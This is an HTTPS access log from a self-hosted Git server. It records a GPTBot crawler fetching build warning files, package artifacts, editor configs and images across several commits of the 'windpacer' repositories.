"/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:17:17:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:17:17:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 13828] [Gzip 6.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:17:18:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 13924744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:17:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 13924744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +[17/Feb/2026:17:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 13852] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:17:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 13859] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:17:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 13818742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:17:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 13924903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:17:18:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 14083] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:17:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 13851] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:17:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13791] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:17:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 10876] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:17:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13797] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:17:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/warn-GoldMonitor_V5.2.txt" +[17/Feb/2026:17:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 10904] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:17:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13471] [Gzip 6.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:17:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 13924903] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +[17/Feb/2026:17:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 14054] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:17:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11567] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode" +[17/Feb/2026:17:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:17:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:17:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:17:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9888] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:17:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9528] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:17:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 6593] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:17:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:17:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 9526] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:17:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:17:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 9893] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:17:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10709] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 13858] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:17:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 7471] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:17:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 13818742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:17:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13502] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:17:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" [Client 74.7.227.38] [Length 13827] [Gzip 6.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/warn-GoldMonitor_V5.1.txt" +[17/Feb/2026:17:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 13495] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:17:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 13818742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +[17/Feb/2026:17:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" [Client 74.7.227.38] [Length 6593] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/warn-GoldMonitor_V5.3.txt" +[17/Feb/2026:17:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 11112] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:17:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11617] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11617] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 11069] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 